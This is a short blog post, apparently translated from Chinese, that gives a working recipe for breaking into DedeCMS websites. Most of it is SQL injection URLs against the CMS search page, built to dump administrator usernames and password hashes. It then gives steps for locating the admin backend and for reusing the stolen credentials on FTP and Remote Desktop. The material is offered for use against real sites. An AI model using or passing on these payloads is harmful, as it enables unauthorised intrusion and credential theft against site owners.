first:
Inject exp
Sometimes the/plus/directory is changed to the/plugins directory
/plugins/search.php? keyword=as&typeArr[111%3D@`\’`)
+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+
from+`% 23@__admin `%23@`\’`+]=a
/plus/search.php? keyword=as&typeArr[111%3D@`\’`)
+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+
from+`% 23@__admin `%23@`\’`+]=a
/plus/search.php? keyword=as&typeArr[111%3D@`\’`)+and+(SELECT+1+FROM+
(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT
(0x7c,userid,0x7c,pwd)+from+`% 23@__admin `+limit+0,1),1,62)))
a+from+information_schema.tables+group+by+a)b)%23@`\’`+]=a
/plus/search.php? keyword=as&typeArr[ uNion ]=a
/robots.txt
/data/admin/ver.txt
/data/mysql_error_trace.inc
The first one is here/data/mysql_error_trace. inc
The second domain name is used as the background or the domain name is deformed
The third is to ping the domain name to get the IP address
http://www.bing.com/
Search ip: 127.0.0.1 php, and you may get the background and other side note stations. Most of the side note stations of dedecms are also dedecms
The fourth view robots.txt
http://www.dedecms.com/robots.txt Check the background address of the social worker target station from the side note station dedecms
The fifth injection exp gets the account, goes to social worker ftp and 3389 password
At least I have succeeded today
Welcome to share experience with friends, and welcome to summarize and supplement
Original article reprint please specify: reprint from Seven Travelers Blog
Fixed link of this article: https://www.qxzxp.com/2740.html